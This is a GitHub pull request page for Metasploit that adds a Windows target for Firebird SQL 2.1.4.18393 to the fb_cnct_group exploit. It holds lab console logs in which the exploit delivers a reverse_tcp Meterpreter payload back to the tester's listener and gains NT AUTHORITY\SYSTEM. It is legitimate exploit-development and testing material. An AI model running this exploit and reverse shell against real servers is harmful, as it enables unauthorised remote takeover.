Add a target for Firebird 2.1.4.18393 #1587

Merged
merged 1 commit into from Mar 14, 2013

Conversation

Projects
None yet
2 participants
@zeroSteiner
Contributor

zeroSteiner commented Mar 13, 2013

Adds support for Firebird SQL version 2.1.4.18393 on Windows.

Version 2.1.4.18393 can be downloaded from here:
http://www.firebirdsql.org/en/firebird-2-1-4/

Tested on Windows 7 SP1.

msf3-git (S:1 J:0)  exploit(fb_cnct_group) > show options 

Module options (exploit/windows/misc/fb_cnct_group):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.90.189   yes       The target address
   RPORT  3050             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.90.184   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Windows FB 2.1.4.18393


msf3-git (S:1 J:0)  exploit(fb_cnct_group) > exploit

[*] Started reverse handler on 192.168.90.184:4444 
[*] 192.168.90.189:3050 - Sending Connection Request For C:\CDIPsRpstMDZP.fdb
[*] Sending stage (752128 bytes) to 192.168.90.189
[*] Meterpreter session 4 opened (192.168.90.184:4444 -> 192.168.90.189:49188) at 2013-03-13 13:43:55 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
@jvazquez-r7

This comment has been minimized.

Show comment Hide comment
@jvazquez-r7

jvazquez-r7 Mar 14, 2013

Contributor

New target tested successfully:

msf  exploit(fb_cnct_group) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows FB 2.5.2.26539
   1   Windows FB 2.5.1.26351
   2   Windows FB 2.1.5.18496
   3   Windows FB 2.1.4.18393
   4   Debug


msf  exploit(fb_cnct_group) > set target 3
target => 3
msf  exploit(fb_cnct_group) > show options

Module options (exploit/windows/misc/fb_cnct_group):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.153    yes       The target address
   RPORT  3050             yes       The target port


Exploit target:

   Id  Name
   --  ----
   3   Windows FB 2.1.4.18393


msf  exploit(fb_cnct_group) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.153:3050 - Sending Connection Request For C:\UbnMNrrDqowBd.fdb
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.153:49554) at 2013-03-14 16:26:31 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

merging!

Contributor

jvazquez-r7 commented Mar 14, 2013

New target tested successfully:

msf  exploit(fb_cnct_group) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows FB 2.5.2.26539
   1   Windows FB 2.5.1.26351
   2   Windows FB 2.1.5.18496
   3   Windows FB 2.1.4.18393
   4   Debug


msf  exploit(fb_cnct_group) > set target 3
target => 3
msf  exploit(fb_cnct_group) > show options

Module options (exploit/windows/misc/fb_cnct_group):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.153    yes       The target address
   RPORT  3050             yes       The target port


Exploit target:

   Id  Name
   --  ----
   3   Windows FB 2.1.4.18393


msf  exploit(fb_cnct_group) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.153:3050 - Sending Connection Request For C:\UbnMNrrDqowBd.fdb
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.153:49554) at 2013-03-14 16:26:31 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

merging!

@jvazquez-r7 jvazquez-r7 merged commit 458ffc1 into rapid7:master Mar 14, 2013

1 check passed

default The Travis build passed
Details

@zeroSteiner zeroSteiner deleted the zeroSteiner:module/fb_cnct_target_214 branch Feb 6, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment